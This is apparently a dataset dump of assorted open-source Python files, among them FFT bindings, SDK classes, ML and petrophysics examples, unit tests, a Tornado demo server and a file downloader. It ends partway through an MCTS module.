max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content |
---|---|---|---|---|
recipes/Python/576550_gsl_real_fft_in_python3/recipe-576550.py | tdiprima/code | 2,023 | 12747786 | '''
provide a simple python3 interface to the gsl_fft_real_transform function
'''
import sys
import cmath
import itertools
from gsl_setup import *
def grouper(n, iterable, fillvalue=None):
# http://docs.python.org/dev/3.0/library/itertools.html#module-itertools
"grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
args = [iter(iterable)] * n
return itertools.zip_longest(fillvalue=fillvalue, *args)
real_workspace_alloc = setup(
gsl.gsl_fft_real_workspace_alloc,[c_ulong,],c_void_p)
real_wavetable_alloc = setup(
gsl.gsl_fft_real_wavetable_alloc,[c_ulong,],c_void_p)
real_workspace_free =setup(gsl.gsl_fft_real_workspace_free ,[c_void_p,])
real_wavetable_free =setup(gsl.gsl_fft_real_wavetable_free ,[c_void_p,])
real_transform = setup(gsl.gsl_fft_real_transform,
[c_void_p,c_ulong,c_ulong,c_void_p,c_void_p],)
class Real_FFT:
    '''
    returns the complex values of the real transform of the real data.
    return value [0] is the offset (DC) term,
    [1] is the amplitude of the term with wavelength equal to the data length,
    and so on, up to
    [-1], the amplitude of the term with wavelength equal to twice the sample distance.
    '''
def __init__(self):
self.n = 0
def __call__(self,data):
if len(data) < 2:
if 1 == len(data):
return data[:]
return []
if len(data) != self.n:
self.__del__()
self.n = len(data)
size = c_ulong(self.n)
self.workspace = real_workspace_alloc(size)
self.wavetable = real_wavetable_alloc(size)
a = array('d',data) # need a copy of the data
real_transform(ADDRESS(a),1,self.n,self.wavetable,self.workspace)
rv = [complex(a[0]),]
rv.extend(itertools.starmap(complex,grouper(2,a[1:],fillvalue=0)))
return rv
def __del__(self):
if self.n:
try:
real_workspace_free(self.workspace)
real_wavetable_free(self.wavetable)
except AttributeError:
print('Attribute error while freeing FFT auxiliary storage',
file=sys.stderr)
except:
print('error freeing FFT auxiliary storage',
file=sys.stderr)
def produce_frequency(self,*,samples=None,sample_interval=None,sample_rate=None,total_length=None):
'''
return the frequency grid based on actual sizes (default sample_interval=1).
'''
n = samples or self.n
if not n:
return array('d')
args_specified = 3 - ((not sample_interval)+(not sample_rate)+(not total_length))
if 1 < args_specified:
raise TypeError('specify at most one of [sample_rate, total_length, sample_interval]')
if 0 == args_specified:
L = n
elif sample_interval:
L = n*sample_interval
elif sample_rate:
L = n/sample_rate
else:
L = total_length
return as_array(waves/L for waves in range(1+n//2))
def produce_period(self,*args,**kwargs):
'''
return the period grid based on actual sizes.
frequency of zero --> period 0. what else to do?
'''
f2T = self.produce_frequency(*args,**kwargs)
for i in range(1,len(f2T)):
f2T[i] = 1/f2T[i]
return f2T
real_fft = Real_FFT()
def magnitude(a):
return [abs(b) for b in a]
def phase(a):
    # use cmath.phase here; calling phase() itself would recurse forever
    return [cmath.phase(b) for b in a]
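
# --- Hedged usage sketch (not part of the original recipe): it assumes the GSL
# --- shared library and the companion gsl_setup module are importable, so it is
# --- left commented out; it only uses names defined above.
# demo_data = [0.0, 1.0, 0.0, -1.0] * 8            # simple periodic test signal
# spectrum = real_fft(demo_data)                   # spectrum[0] is the offset (DC) term
# freqs = real_fft.produce_frequency(sample_interval=0.5)
# print(magnitude(spectrum))
# print(list(freqs))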
|
alipay/aop/api/domain/QueryComplexLabelRule.py | snowxmas/alipay-sdk-python-all | 213 | 12747788 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class QueryComplexLabelRule(object):
def __init__(self):
self._label_id = None
self._label_name = None
self._label_value = None
self._operator = None
@property
def label_id(self):
return self._label_id
@label_id.setter
def label_id(self, value):
self._label_id = value
@property
def label_name(self):
return self._label_name
@label_name.setter
def label_name(self, value):
self._label_name = value
@property
def label_value(self):
return self._label_value
@label_value.setter
def label_value(self, value):
self._label_value = value
@property
def operator(self):
return self._operator
@operator.setter
def operator(self, value):
self._operator = value
def to_alipay_dict(self):
params = dict()
if self.label_id:
if hasattr(self.label_id, 'to_alipay_dict'):
params['label_id'] = self.label_id.to_alipay_dict()
else:
params['label_id'] = self.label_id
if self.label_name:
if hasattr(self.label_name, 'to_alipay_dict'):
params['label_name'] = self.label_name.to_alipay_dict()
else:
params['label_name'] = self.label_name
if self.label_value:
if hasattr(self.label_value, 'to_alipay_dict'):
params['label_value'] = self.label_value.to_alipay_dict()
else:
params['label_value'] = self.label_value
if self.operator:
if hasattr(self.operator, 'to_alipay_dict'):
params['operator'] = self.operator.to_alipay_dict()
else:
params['operator'] = self.operator
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = QueryComplexLabelRule()
if 'label_id' in d:
o.label_id = d['label_id']
if 'label_name' in d:
o.label_name = d['label_name']
if 'label_value' in d:
o.label_value = d['label_value']
if 'operator' in d:
o.operator = d['operator']
return o
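
# --- Hedged usage sketch (not part of the SDK file): round-trip through the two
# --- dict helpers above; all field values are placeholders.
# rule = QueryComplexLabelRule()
# rule.label_id = 'L123'
# rule.label_name = 'age'
# rule.label_value = '30'
# rule.operator = 'EQ'
# payload = rule.to_alipay_dict()                  # plain dict ready for json.dumps
# restored = QueryComplexLabelRule.from_alipay_dict(payload)
# assert restored.label_id == rule.label_id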
|
lib/_included_packages/plexnet/threadutils.py | aleenator/plex-for-kodi | 233 | 12747815 |
# import inspect
# import ctypes
from __future__ import absolute_import
import threading
# import time
# def _async_raise(tid, exctype):
# '''Raises an exception in the threads with id tid'''
# if not inspect.isclass(exctype):
# raise TypeError("Only types can be raised (not instances)")
# try:
# res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), ctypes.py_object(exctype))
# except AttributeError:
# # To catch: undefined symbol: PyThreadState_SetAsyncExc
# return
# if res == 0:
# raise ValueError("invalid thread id")
# elif res != 1:
# # "if it returns a number greater than one, you're in trouble,
# # and you should call it again with exc=NULL to revert the effect"
# ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), 0)
# raise SystemError("PyThreadState_SetAsyncExc failed")
# class KillThreadException(Exception):
# pass
class KillableThread(threading.Thread):
pass
'''A thread class that supports raising exception in the thread from
another thread.
'''
# def _get_my_tid(self):
# """determines this (self's) thread id
# CAREFUL : this function is executed in the context of the caller
# thread, to get the identity of the thread represented by this
# instance.
# """
# if not self.isAlive():
# raise threading.ThreadError("the thread is not active")
# return self.ident
# def _raiseExc(self, exctype):
# """Raises the given exception type in the context of this thread.
# If the thread is busy in a system call (time.sleep(),
# socket.accept(), ...), the exception is simply ignored.
# If you are sure that your exception should terminate the thread,
# one way to ensure that it works is:
# t = ThreadWithExc( ... )
# ...
# t.raiseExc( SomeException )
# while t.isAlive():
# time.sleep( 0.1 )
# t.raiseExc( SomeException )
# If the exception is to be caught by the thread, you need a way to
# check that your thread has caught it.
# CAREFUL : this function is executed in the context of the
    # caller thread, to raise an exception in the context of the
# thread represented by this instance.
# """
# _async_raise(self._get_my_tid(), exctype)
def kill(self, force_and_wait=False):
pass
# try:
# self._raiseExc(KillThreadException)
# if force_and_wait:
# time.sleep(0.1)
# while self.isAlive():
# self._raiseExc(KillThreadException)
# time.sleep(0.1)
# except threading.ThreadError:
# pass
# def onKilled(self):
# pass
# def run(self):
# try:
# self._Thread__target(*self._Thread__args, **self._Thread__kwargs)
# except KillThreadException:
# self.onKilled()
|
examples/torchscript_resnet18_all_output_types.py | rdadolf/torch-mlir | 213 | 12747828 | # Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
# Also available under a BSD-style license. See LICENSE.
import torch
import torchvision
import torch_mlir
resnet18 = torchvision.models.resnet18(pretrained=True)
resnet18.eval()
module = torch_mlir.compile(resnet18, torch.ones(1, 3, 224, 224), output_type=torch_mlir.OutputType.TORCH)
print("TORCH OutputType\n", module.operation.get_asm(large_elements_limit=10))
module = torch_mlir.compile(resnet18, torch.ones(1, 3, 224, 224), output_type=torch_mlir.OutputType.LINALG_ON_TENSORS)
print("LINALG_ON_TENSORS OutputType\n", module.operation.get_asm(large_elements_limit=10))
# TODO: Debug why this is so slow.
module = torch_mlir.compile(resnet18, torch.ones(1, 3, 224, 224), output_type=torch_mlir.OutputType.TOSA)
print("TOSA OutputType\n", module.operation.get_asm(large_elements_limit=10))
|
examples/wolfcamp_single.py | SPWLA-ORG/PetroPy | 145 | 12747868 |
"""
==================================
Wolfcamp Example - Single las file
==================================
This example shows the full petrophysical workflow available in PetroPy
for a single wolfcamp las file courtesy of University Lands Texas.
The workflow progresses in these 11 steps
1. Read las file and create a :class:`petropy.Log` object
2. Load tops from a csv file using :meth:`petropy.Log.tops_from_csv`
3. Create a :class:`petropy.LogViewer` show in edit_mode to fix data
4. Define formations for calculations.
5. Calculate fluid properties by
1. Loading parameters via :meth:`petropy.Log.fluid_properties_parameters_from_csv`
2. Calculating over formations via :meth:`petropy.Log.formation_fluid_properties`
6. Calculate multimineral properties by
1. Loading parameters via :meth:`petropy.Log.multimineral_parameters_from_csv`
2. Calculating over formations via :meth:`petropy.Log.formation_multimineral_model`
7. Curve summations via :meth:`petropy.Log.summations`
8. Adding pay flags via :meth:`petropy.Log.add_pay_flag`
9. Clustering intervals into Electrofacies via :meth:`petropy.electrofacies`
10. Exporting log statistics via :meth:`petropy.Log.statistics`
11. Saving LogViewer to png and Log to las
To bulk process a folder of las files at once, use the `bulk example`_ .
Downloading the script at the bottom of this webpage will not download the required las
file or PetroPy logo. To download all files, view the `examples folder`_ on GitHub.
.. _bulk example: wolfcamp_bulk.html
.. _examples folder: https://github.com/toddheitmann/PetroPy/tree/master/examples
"""
import petropy as ptr
# import pyplot to add logo to figure
import matplotlib.pyplot as plt
### 1. Read las file
# create a Log object by reading a file path #
las_file_path = '42303347740000.las'
log = ptr.Log(las_file_path)
### 2. load tops ###
tops_file_path = 'tops.csv'
log.tops_from_csv(tops_file_path)
### 3. graphically edit log ###
# use manual mode for fixing borehole washout #
# and other changes requiring redrawing data #
# use bulk shift mode to linearly adjust all #
# curve data #
# close both windows to continue program #
viewer = ptr.LogViewer(log, top = 6950, height = 100)
viewer.show(edit_mode = True)
# overwrite log variable with updated log #
# from LogViewer edits #
log = viewer.log
### 4. define formations ###
f = ['WFMPA', 'WFMPB', 'WFMPC']
### 5. fluid properties ###
# load fluid properties from a csv file #
# since path is not specified, load default #
# csv file included with petropy #
log.fluid_properties_parameters_from_csv()
# calculate fluid properties over defined #
# formations with parameter WFMP from #
# previously loaded csv #
log.formation_fluid_properties(f, parameter = 'WFMP')
### 6. multimineral model ###
# load multimineral parameters from csv file #
# since path is not specified, load default #
# csv file included with petropy #
log.multimineral_parameters_from_csv()
# calculate multimineral model over defined #
# formations with parameter WFMP from #
# previously loaded csv #
log.formation_multimineral_model(f, parameter = 'WFMP')
### 7. summations ###
# define curves to calculate cumulative values #
c = ['OIP', 'BVH', 'PHIE']
# calculate cumulative values over formations #
log.summations(f, curves = c)
### 8. pay flags ###
# define pay flags as list of tuples for #
# (curve, value) #
flag_1_gtoe = [('PHIE', 0.03)]
flag_2_gtoe = [('PAY_FLAG_1', 1), ('BVH', 0.02)]
flag_3_gtoe = [('PAY_FLAG_2', 1)]
flag_3_ltoe = [('SW', 0.2)]
# add pay flags over defined formations #
log.add_pay_flag(f, greater_than_or_equal = flag_1_gtoe)
log.add_pay_flag(f, greater_than_or_equal = flag_2_gtoe)
log.add_pay_flag(f, greater_than_or_equal = flag_3_gtoe,
less_than_or_equal = flag_3_ltoe)
### 9. electrofacies ###
# define curves to use in electrofacies module #
electro_logs = ['GR_N', 'RESDEEP_N', 'NPHI_N', 'RHOB_N', 'PE_N']
# make a list of Log objects as input #
logs = [log]
# calculate electrofacies for the defined logs#
# over the specified formations #
# finding 6 clusters of electrofacies #
# with RESDEEP_N logarithmically scaled #
logs = ptr.electrofacies(logs, f, electro_logs, 6,
log_scale = ['RESDEEP_N'])
# unpack log object from returned list #
log = logs[0]
### 10. statistics ###
# define list of curves to find statistics #
stats_curves = ['OIP', 'BVH', 'PHIE', 'SW', 'VCLAY', 'TOC']
# pay flag and facies curve names to include #
# in the interval statistics (assumed names: #
# the three flags created in step 8 and the #
# FACIES curve from step 9) #
pay_flags = ['PAY_FLAG_1', 'PAY_FLAG_2', 'PAY_FLAG_3']
facies_curves = ['FACIES']
# calculate stats over specified formation and#
# save to csv file wfmp_statistics.csv #
# update the line if the well, formation is #
# already included in the csv file #
log.statistics_to_csv('wfmp_statistics.csv', replace = True,
                      formations = f, curves = stats_curves,
                      pay_flags = pay_flags, facies = facies_curves)
### 11. export data ###
# find way to name well, looking for well name#
# or UWI or API #
if len(log.well['WELL'].value) > 0:
well_name = log.well['WELL'].value
elif len(str(log.well['UWI'].value)) > 0:
well_name = str(log.well['UWI'].value)
elif len(log.well['API'].value) > 0:
well_name = str(log.well['API'].value)
else:
well_name = 'UNKNOWN'
well_name = well_name.replace('.', '')
# scale height of viewer to top and bottom #
# of calculated values #
wfmpa_top = log.tops['WFMPA']
wfmpc_base = log.next_formation_depth('WFMPC')
top = wfmpa_top
height = wfmpc_base - wfmpa_top
# create LogViewer with the default full_oil #
# template included in petropy #
viewer = ptr.LogViewer(log, top = top, height = height,
template_defaults = 'full_oil')
# set viewer to 17x11 inches size for use in #
# PowerPoint or printing to larger paper #
viewer.fig.set_size_inches(17, 11)
# add well_name to title of LogViewer #
viewer.fig.suptitle(well_name, fontweight = 'bold', fontsize = 30)
# add logo to top left corner #
logo_im = plt.imread('company_logo.png')
logo_ax = viewer.fig.add_axes([0, 0.85, 0.2, 0.2])
logo_ax.imshow(logo_im)
logo_ax.axis('off')
# add text to top right corner #
if len(str(log.well['UWI'].value)) > 0:
label = 'UWI: ' + str(log.well['UWI'].value) + '\n'
elif len(log.well['API'].value) > 0:
label = 'API: ' + str(log.well['API'].value) + '\n'
else:
label = ''
label += 'County: Reagan\nCreated By: <NAME>\n'
label += 'Creation Date: October 23, 2017'
viewer.axes[0].annotate(label, xy = (0.99,0.99),
xycoords = 'figure fraction',
horizontalalignment = 'right',
verticalalignment = 'top',
fontsize = 14)
# save figure and log #
viewer_file_name=r'%s_processed.png' % well_name
las_file_name = r'%s_processed.las' % well_name
viewer.fig.savefig(viewer_file_name)
viewer.log.write(las_file_name)
|
homeassistant/components/rpi_power/const.py | tbarbette/core | 30,023 | 12747870 | """Constants for Raspberry Pi Power Supply Checker."""
DOMAIN = "rpi_power"
|
podman/tests/unit/test_manifests.py | kevinwylder/podman-py | 106 | 12747879 |
import unittest
from podman import PodmanClient, tests
from podman.domain.manifests import ManifestsManager, Manifest
class ManifestTestCase(unittest.TestCase):
def setUp(self) -> None:
super().setUp()
self.client = PodmanClient(base_url=tests.BASE_SOCK)
def tearDown(self) -> None:
super().tearDown()
self.client.close()
def test_podmanclient(self):
manager = self.client.manifests
self.assertIsInstance(manager, ManifestsManager)
def test_list(self):
with self.assertRaises(NotImplementedError):
self.client.manifests.list()
def test_name(self):
with self.assertRaises(ValueError):
manifest = Manifest(attrs={"names": ""})
_ = manifest.name
with self.assertRaises(ValueError):
manifest = Manifest()
_ = manifest.name
if __name__ == '__main__':
unittest.main()
|
examples.py | pauloromeira/onegram | 150 | 12747894 |
#!/usr/bin/env python
from operator import itemgetter
from itertools import islice
from collections import defaultdict
from onegram import Login, login, logout
# Queries
from onegram import user_info, post_info
from onegram import followers, following
from onegram import posts, likes, comments, feed
from onegram import explore
# Actions
from onegram import follow, unfollow
from onegram import like, unlike
from onegram import comment, uncomment
from onegram import save, unsave
def likers_rank(user=None):
rank = defaultdict(int)
for post in posts(user):
for like in likes(post):
username = like['username']
rank[username] += 1
return sorted(rank.items(), key=itemgetter(1), reverse=True)
def commenters_rank(user=None):
rank = defaultdict(int)
for post in posts(user):
for commentary in comments(post):
username = commentary['owner']['username']
rank[username] += 1
return sorted(rank.items(), key=itemgetter(1), reverse=True)
p = next(posts('other'))
like(p)
unlike(p)
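
# --- Hedged usage sketch (usernames and credentials are placeholders, Login
# --- signature assumed): the rank helpers above are meant to run inside an
# --- authenticated session, e.g.:
# with Login(username='someuser', password='...'):
#     print(likers_rank('someuser')[:10])
#     print(commenters_rank('someuser')[:10])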
|
client/verta/tests/bases/test_deployable_entity.py | benshaw/modeldb | 835 | 12747922 |
# -*- coding: utf-8 -*-
import hashlib
import string
import tempfile
import hypothesis
import hypothesis.strategies as st
import six
from verta._protos.public.common import CommonService_pb2
from verta._internal_utils import _artifact_utils
from verta.tracking.entities._deployable_entity import _DeployableEntity
class TestBuildArtifactStorePath:
@hypothesis.example(
artifact_bytes=b"foo",
key="my_artifact",
ext="pkl",
)
@hypothesis.given(
artifact_bytes=st.binary(min_size=1),
key=st.text(st.characters(blacklist_characters="."), min_size=1),
ext=st.text(st.characters(blacklist_characters="."), min_size=1),
)
def test_with_ext(self, artifact_bytes, key, ext):
checksum = hashlib.sha256(artifact_bytes).hexdigest()
filename = key + "." + ext
expected_path = checksum + "/" + filename
artifact_path = _DeployableEntity._build_artifact_store_path(
artifact_stream=six.BytesIO(artifact_bytes),
key=key,
ext=ext,
)
assert artifact_path == expected_path
@hypothesis.example(artifact_bytes=b"foo", key="model")
@hypothesis.example(artifact_bytes=b"foo", key="model_api.json")
@hypothesis.given(
artifact_bytes=st.binary(min_size=1),
key=st.text(min_size=1),
)
def test_no_ext(self, artifact_bytes, key):
checksum = hashlib.sha256(artifact_bytes).hexdigest()
filename = key
expected_path = checksum + "/" + filename
artifact_path = _DeployableEntity._build_artifact_store_path(
artifact_stream=six.BytesIO(artifact_bytes),
key=key,
)
assert artifact_path == expected_path
class TestCreateArtifactMsg:
@hypothesis.given(
artifact_bytes=st.binary(min_size=1),
key=st.text(
st.characters(
blacklist_categories=("Cs",), # invalid UTF-8
blacklist_characters=".",
),
min_size=1,
),
ext=st.text(
st.characters(
whitelist_categories=("Lu", "Ll", "Nd"), # alphanumeric
),
min_size=1,
),
artifact_type=st.sampled_from(
CommonService_pb2.ArtifactTypeEnum.ArtifactType.values(),
),
method=st.text(min_size=1),
framework=st.text(min_size=1),
)
def test_with_ext(
self,
artifact_bytes,
key,
ext,
artifact_type,
method,
framework,
):
with tempfile.NamedTemporaryFile(suffix="." + ext) as tempf:
tempf.write(artifact_bytes)
tempf.seek(0)
artifact_msg = _DeployableEntity._create_artifact_msg(
key,
tempf,
artifact_type,
method,
framework,
# no explicit extension
)
checksum = hashlib.sha256(artifact_bytes).hexdigest()
artifact_path = checksum + "/" + key + "." + ext
assert artifact_msg == CommonService_pb2.Artifact(
key=key,
path=artifact_path,
path_only=False,
artifact_type=artifact_type,
filename_extension=ext,
serialization=method,
artifact_subtype=framework,
)
|
vedacore/parallel/_functions.py | jie311/vedadet | 424 | 12747926 |
# Copyright (c) Open-MMLab. All rights reserved.
import torch
from torch.nn.parallel._functions import _get_stream
def scatter(input, devices, streams=None):
"""Scatters tensor across multiple GPUs.
"""
if streams is None:
streams = [None] * len(devices)
if isinstance(input, list):
chunk_size = (len(input) - 1) // len(devices) + 1
outputs = [
scatter(input[i], [devices[i // chunk_size]],
[streams[i // chunk_size]]) for i in range(len(input))
]
return outputs
elif isinstance(input, torch.Tensor):
output = input.contiguous()
# TODO: copy to a pinned buffer first (if copying from CPU)
stream = streams[0] if output.numel() > 0 else None
with torch.cuda.device(devices[0]), torch.cuda.stream(stream):
output = output.cuda(devices[0], non_blocking=True)
return output
else:
raise Exception(f'Unknown type {type(input)}.')
def synchronize_stream(output, devices, streams):
if isinstance(output, list):
chunk_size = len(output) // len(devices)
for i in range(len(devices)):
for j in range(chunk_size):
synchronize_stream(output[i * chunk_size + j], [devices[i]],
[streams[i]])
elif isinstance(output, torch.Tensor):
if output.numel() != 0:
with torch.cuda.device(devices[0]):
main_stream = torch.cuda.current_stream()
main_stream.wait_stream(streams[0])
output.record_stream(main_stream)
else:
raise Exception(f'Unknown type {type(output)}.')
def get_input_device(input):
if isinstance(input, list):
for item in input:
input_device = get_input_device(item)
if input_device != -1:
return input_device
return -1
elif isinstance(input, torch.Tensor):
return input.get_device() if input.is_cuda else -1
else:
raise Exception(f'Unknown type {type(input)}.')
class Scatter:
@staticmethod
def forward(target_gpus, input):
input_device = get_input_device(input)
streams = None
if input_device == -1:
# Perform CPU to GPU copies in a background stream
streams = [_get_stream(device) for device in target_gpus]
outputs = scatter(input, target_gpus, streams)
# Synchronize with the copy stream
if streams is not None:
synchronize_stream(outputs, target_gpus, streams)
return tuple(outputs)
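
# --- Hedged usage sketch (not part of the original module; requires at least
# --- two CUDA devices):
# x = torch.randn(4, 3)
# chunks = [x[:2], x[2:]]
# outputs = Scatter.forward([0, 1], chunks)   # each chunk is copied to one GPU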
|
tests/unit/cli/test_archives.py | tehlingchu/anchore-cli | 110 | 12747934 | from anchorecli.cli import archives
|
Whole-App-Acceleration/apps/resnet50/build_flow/DPUCADF8H_u200/scripts/utility/readme_gen/gs_summary_subdir.py | hito0512/Vitis-AI | 848 | 12747975 |
#!/usr/bin/env python
import os, re
import fnmatch
import json
import sys
sys.path.append(".")
import gs_summary_util
gs_summary_util.genReadMe2(".")
|
r2l/rerank.py | thilakshiK/wmt16-scripts | 132 | 12747982 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: <NAME>
# Distributed under MIT license
import sys
from collections import defaultdict
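
# Hedged usage note (not in the original script): stdin is expected to be a
# Moses-style n-best list, one hypothesis per line:
#   <sentence id> ||| <hypothesis> ||| <feature scores separated by spaces>
# Example invocation (file names are placeholders):
#   ./rerank.py 50 < nbest.r2l.txt > best.txt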
if __name__ == '__main__':
if len(sys.argv) > 1:
k = int(sys.argv[1])
else:
k = float('inf')
cur = 0
best_score = float('inf')
best_sent = ''
idx = 0
for line in sys.stdin:
num, sent, scores = line.split(' ||| ')
# new input sentence: print best translation of previous sentence, and reset stats
if int(num) > cur:
print best_sent
#print best_score
cur = int(num)
best_score = float('inf')
best_sent = ''
idx = 0
#only consider k-best hypotheses
if idx >= k:
continue
score = sum(map(float, scores.split()))
if score < best_score:
best_score = score
best_sent = sent.strip()
idx += 1
# end of file; print best translation of last sentence
print best_sent
# print best_score
|
demo.py | dmis-lab/BioSyn | 114 | 12747993 |
import argparse
import os
import pdb
import pickle
import tornado.web
import tornado.ioloop
import tornado.autoreload
import logging
import json
from src.biosyn import (
DictionaryDataset,
BioSyn,
TextPreprocess
)
logging.basicConfig(
filename='.server.log',
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO
)
parser = argparse.ArgumentParser(description='BioSyn Demo')
# Required
parser.add_argument('--model_name_or_path', required=True, help='Directory for model')
# Settings
parser.add_argument('--port', type=int, default=8888, help='port number')
parser.add_argument('--show_predictions', action="store_true")
parser.add_argument('--dictionary_path', type=str, default=None, help='dictionary path')
parser.add_argument('--use_cuda', action="store_true")
args = parser.parse_args()
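
# Hedged usage note (paths and checkpoint name are placeholders, not from this repo):
#   python demo.py --model_name_or_path ./checkpoint_dir \
#                  --dictionary_path ./dictionary.txt --port 8888
# and then query the running server, e.g.:
#   curl 'http://localhost:8888/normalize/?string=breast%20cancer'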
def cache_or_load_dictionary():
dictionary_name = os.path.splitext(os.path.basename(args.dictionary_path))[0]
cached_dictionary_path = os.path.join(
'./tmp',
"cached_{}.pk".format(dictionary_name)
)
# If exist, load the cached dictionary
if os.path.exists(cached_dictionary_path):
with open(cached_dictionary_path, 'rb') as fin:
cached_dictionary = pickle.load(fin)
print("Loaded dictionary from cached file {}".format(cached_dictionary_path))
dictionary, dict_sparse_embeds, dict_dense_embeds = (
cached_dictionary['dictionary'],
cached_dictionary['dict_sparse_embeds'],
cached_dictionary['dict_dense_embeds'],
)
else:
dictionary = DictionaryDataset(dictionary_path = args.dictionary_path).data
dictionary_names = dictionary[:,0]
dict_sparse_embeds = biosyn.embed_sparse(names=dictionary_names, show_progress=True)
dict_dense_embeds = biosyn.embed_dense(names=dictionary_names, show_progress=True)
cached_dictionary = {
'dictionary': dictionary,
'dict_sparse_embeds' : dict_sparse_embeds,
'dict_dense_embeds' : dict_dense_embeds
}
if not os.path.exists('./tmp'):
os.mkdir('./tmp')
with open(cached_dictionary_path, 'wb') as fin:
pickle.dump(cached_dictionary, fin)
print("Saving dictionary into cached file {}".format(cached_dictionary_path))
return dictionary, dict_sparse_embeds, dict_dense_embeds
def normalize(mention):
# preprocess mention
mention = TextPreprocess().run(mention)
# embed mention
mention_sparse_embeds = biosyn.embed_sparse(names=[mention])
mention_dense_embeds = biosyn.embed_dense(names=[mention])
    # calculate score matrix and get top 1
sparse_score_matrix = biosyn.get_score_matrix(
query_embeds=mention_sparse_embeds,
dict_embeds=dict_sparse_embeds
)
dense_score_matrix = biosyn.get_score_matrix(
query_embeds=mention_dense_embeds,
dict_embeds=dict_dense_embeds
)
sparse_weight = biosyn.get_sparse_weight().item()
hybrid_score_matrix = sparse_weight * sparse_score_matrix + dense_score_matrix
hybrid_candidate_idxs = biosyn.retrieve_candidate(
score_matrix = hybrid_score_matrix,
topk = 10
)
# get predictions from dictionary
predictions = dictionary[hybrid_candidate_idxs].squeeze(0)
output = {
'predictions' : []
}
for prediction in predictions:
predicted_name = prediction[0]
predicted_id = prediction[1]
output['predictions'].append({
'name': predicted_name,
'id': predicted_id
})
return output
# load biosyn model
biosyn = BioSyn(
use_cuda=args.use_cuda,
max_length=25
)
biosyn.load_model(
model_name_or_path=args.model_name_or_path
)
# cache or load dictionary
dictionary, dict_sparse_embeds, dict_dense_embeds = cache_or_load_dictionary()
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render("./template/index.html")
class NormalizeHandler(tornado.web.RequestHandler):
def get(self):
string = self.get_argument('string', '')
logging.info('get!{}'.format({
'string':string,
}))
self.set_header("Content-Type", "application/json")
output = normalize(mention=string)
self.write(json.dumps(output))
def make_app():
settings={
'debug':True
}
return tornado.web.Application([
(r"/", MainHandler),
(r"/normalize/", NormalizeHandler),
(r'/semantic/(.*)', tornado.web.StaticFileHandler, {'path': './semantic'}),
(r'/images/(.*)', tornado.web.StaticFileHandler, {'path': './images'}),
],**settings)
if __name__ == '__main__':
logging.info('Starting biosyn server at http://localhost:{}'.format(args.port))
app = make_app()
app.listen(args.port)
tornado.ioloop.IOLoop.current().start() |
lib/PyAMF-0.6.1/pyamf/tests/adapters/_google_models.py | MiCHiLU/google_appengine_sdk | 790 | 12748003 |
from google.appengine.ext import db
class PetModel(db.Model):
"""
"""
# 'borrowed' from http://code.google.com/appengine/docs/datastore/entitiesandmodels.html
name = db.StringProperty(required=True)
type = db.StringProperty(required=True, choices=set(["cat", "dog", "bird"]))
birthdate = db.DateProperty()
weight_in_pounds = db.IntegerProperty()
spayed_or_neutered = db.BooleanProperty()
class PetExpando(db.Expando):
"""
"""
name = db.StringProperty(required=True)
type = db.StringProperty(required=True, choices=set(["cat", "dog", "bird"]))
birthdate = db.DateProperty()
weight_in_pounds = db.IntegerProperty()
spayed_or_neutered = db.BooleanProperty()
class ListModel(db.Model):
"""
"""
numbers = db.ListProperty(long)
class GettableModelStub(db.Model):
"""
"""
gets = []
@staticmethod
def get(*args, **kwargs):
GettableModelStub.gets.append([args, kwargs])
class Author(db.Model):
name = db.StringProperty()
class Novel(db.Model):
title = db.StringProperty()
author = db.ReferenceProperty(Author)
class EmptyModel(db.Model):
"""
A model that has no properties but also has no entities in the datastore.
"""
|
general/file-downloader/download.py | caesarcc/python-code-tutorials | 1,059 | 12748020 |
from tqdm import tqdm
import requests
import cgi
import sys
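
# Hedged usage example (the URL is a placeholder): python download.py https://example.com/archive.zip
# The file name is taken from the Content-Disposition header when present, otherwise from the URL.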
# the url of file you want to download, passed from command line arguments
url = sys.argv[1]
# read 1024 bytes every time
buffer_size = 1024
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the default filename
default_filename = url.split("/")[-1]
# get the content disposition header
content_disposition = response.headers.get("Content-Disposition")
if content_disposition:
# parse the header using cgi
value, params = cgi.parse_header(content_disposition)
# extract filename from content disposition
filename = params.get("filename", default_filename)
else:
    # if content disposition is not available, just use the default file name from the URL
filename = default_filename
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(buffer_size), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress.iterable:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data)) |
examples/design_search/mcts.py | ONLYA/RoboGrammar | 156 | 12748028 |
from collections import defaultdict
from math import log, sqrt
import random
class TreeNode(object):
def __init__(self, state):
self.state = state
self.visit_count = 0
self.result_sum = 0
self.result_max = float('-inf')
self.action_visit_counts = defaultdict(int)
self.action_result_sums = defaultdict(float)
self.action_result_maxes = defaultdict(lambda: float('-inf'))
self.amaf_action_visit_counts = defaultdict(int)
self.amaf_action_result_sums = defaultdict(float)
self.amaf_action_result_maxes = defaultdict(lambda: float('-inf'))
self.blocked = False
class TreeSearch(object):
def __init__(self, env, max_tries, default_policy=None):
self.env = env
self.max_tries = max_tries
self.nodes = dict() # Mapping from state keys to nodes
self.nodes[env.get_key(env.initial_state)] = TreeNode(env.initial_state)
self.default_policy = default_policy
def uct_score(self, node, action, amaf_threshold=10):
action_visit_count = node.action_visit_counts[action]
action_result_max = node.action_result_maxes[action]
amaf_action_visit_count = node.amaf_action_visit_counts[action]
amaf_action_result_max = node.amaf_action_result_maxes[action]
# AMAF and Monte Carlo values are weighted equally when the visit count is
# amaf_threshold
amaf_weight = sqrt(amaf_threshold / (3 * node.visit_count + amaf_threshold))
if action_visit_count > 0:
